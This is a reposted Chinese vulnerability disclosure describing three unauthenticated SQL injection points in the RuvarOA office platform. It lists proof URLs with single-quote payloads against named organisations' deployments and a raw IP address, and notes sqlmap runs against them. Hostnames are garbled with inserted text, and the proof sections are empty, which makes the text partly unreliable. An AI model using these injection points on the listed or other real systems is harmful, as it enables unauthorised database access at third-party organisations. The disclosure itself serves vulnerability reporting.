@what_news 发布的 WooYun: 某通用企业版OA系统SQL注入大礼包 中,说注入差不多找完了,其实还有漏网之鱼,哈哈,让小菜捡了个便宜
注:get_dict.aspx 一处重复 开发公司:广州市璐华计算机有限公司(http://HdhCmsTestruvar测试数据/) 程序名称:RuvarOA企业协同办公平台 漏洞 类型:SQL注入 是否需要登录:否 漏洞文件:WebUtility/SearchCondiction. asp x WebUtility/get_find_condiction.aspx include/get_dict.aspx 关键字没找到.. 用大牛的测试例子吧 影响用户:
实例演示: ###NO.1: PageID 存在注入
官方案例 http://oa.ruvar测试数据/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 协同办公平台 http://oa.gdjierong测试数据:8090/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 金华威协同办公平台 http://HdhCmsTestkinghighway测试数据:9000/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 明师教育协同办公平台 http://oa.mingshiedu测试数据:801/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 http://116.204.107.145:9000/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1加单引号 ' 直接报错:
SQLMAP跑一下 1.官方案例http://oa.ruvar测试数据
2.协同办公平台http://oa.gdjierong测试数据:8090/
3.金华威协同办公平台http://HdhCmsTestkinghighway测试数据:9000/ 这个站SQLMAP跑起来太慢,就简单证明了
4.明师教育协同办公平台http://oa.mingshiedu测试数据:801/
5.http://116.204.107.145:9000/
####NO.2: PageID 参数存在注入
漏洞证明:
####NO.3: bt_id 参数存在注入
1.
2.
3.
4.
5.
修复方案:
过滤
查看更多关于某通用企业版OA系统三处SQL注入(无需登录) -的详细内容...